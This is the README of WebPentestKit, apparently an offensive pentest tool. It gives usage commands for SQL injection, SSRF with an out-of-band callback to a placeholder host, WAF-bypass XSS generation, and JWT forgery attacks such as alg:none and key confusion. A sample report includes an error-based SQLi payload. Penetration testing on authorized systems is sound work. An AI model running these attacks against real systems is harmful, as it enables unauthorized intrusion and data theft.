Modular Web Application Penetration Testing Framework
SQLi · SSRF · XSS · JWT — four powerful modules, one command-line tool.
⚠️ For authorized systems only. This tool is intended for educational purposes and legal penetration testing.
| Module | Techniques | Targets |
|---|---|---|
sqli |
Error-based, Blind Boolean, Time-based | MySQL, MSSQL, Oracle, PostgreSQL |
ssrf |
Cloud metadata, Internal network, Protocol attacks, Callback listener | AWS/GCP/Azure, internal networks |
xss |
Context-aware payload generation, WAF bypass, Polyglot | Cloudflare, ModSecurity, Akamai |
jwt |
alg:none, RS256→HS256 confusion, kid injection, JWKS spoofing | Any JWT-validating endpoint |
git clone https://github.com/ozancolhak/WebPentestKit
cd WebPentestKit
pip install -r requirements.txt# Full scan with all techniques
python3 webpentestkit.py sqli -u "http://target.com/page?id=1" -p id --dbms mysql
# Time-based only, save JSON report
python3 webpentestkit.py sqli -u "http://target.com/item?id=5" -p id -t time -o report.json
# Multi-threaded blind scan
python3 webpentestkit.py sqli -u "http://target.com/user?uid=3" -p uid -t blind --threads 10Supported techniques: error · blind · time · all
# Cloud metadata + internal network scan
python3 webpentestkit.py ssrf -u "http://target.com/fetch?url=x" -p url
# With local callback listener (out-of-band detection)
python3 webpentestkit.py ssrf -u "http://target.com/fetch?url=x" -p url \
--listen --port 8888 --callback "http://YOUR_IP:8888"
# Cloud payloads only
python3 webpentestkit.py ssrf -u "http://target.com/proxy?target=x" -p target \
--payloads cloud -o ssrf_report.jsonPayload categories: AWS · GCP · Azure · Internal (RFC1918) · Protocol attacks (file://, dict://, gopher://) · IP encoding bypass (Octal, Hex, Decimal, IPv6)
# Generate Cloudflare bypass payloads
python3 webpentestkit.py xss --generate --waf cloudflare --context html -o payloads.txt
# Scan a target (context auto-detected)
python3 webpentestkit.py xss --scan -u "http://target.com/search?q=test" -p q
# Generate all contexts with ModSecurity bypass
python3 webpentestkit.py xss --generate --waf modsec --context all -o all_payloads.txtWAF profiles: cloudflare · modsec · akamai · generic
Contexts: html · js · attr · all
# Analyze token and run all attacks
python3 webpentestkit.py jwt -t "eyJ..." --attack all --url http://target.com/api/profile
# alg:none bypass
python3 webpentestkit.py jwt -t "eyJ..." --attack none --url http://target.com/api/me
# RS256 → HS256 key confusion
python3 webpentestkit.py jwt -t "eyJ..." --attack rs2hs --key public.pem \
--url http://target.com/api/admin
# kid injection (SQLi / Path Traversal)
python3 webpentestkit.py jwt -t "eyJ..." --attack kid --url http://target.com/api/dataAttack types:
| Type | Description |
|---|---|
none |
alg:none/None/NONE/nOnE variants |
rs2hs |
Uses public key as HS256 secret |
kid |
SQLi and path traversal via kid header |
jwks |
jku/x5u/x5c header vulnerability analysis |
Every module supports --output report.json for structured JSON reports:
{
"tool": "WebPentestKit",
"total_findings": 2,
"findings": [
{
"module": "SQLi",
"severity": "CRITICAL",
"title": "Error-based SQLi (mysql)",
"detail": "Parameter 'id' is vulnerable to error-based SQLi.",
"evidence": {
"payload": "' AND extractvalue(1,concat(0x7e,(SELECT version())))--",
"pattern": "you have an error in your sql syntax"
}
}
]
}Severity levels: CRITICAL → HIGH → MEDIUM → LOW → INFO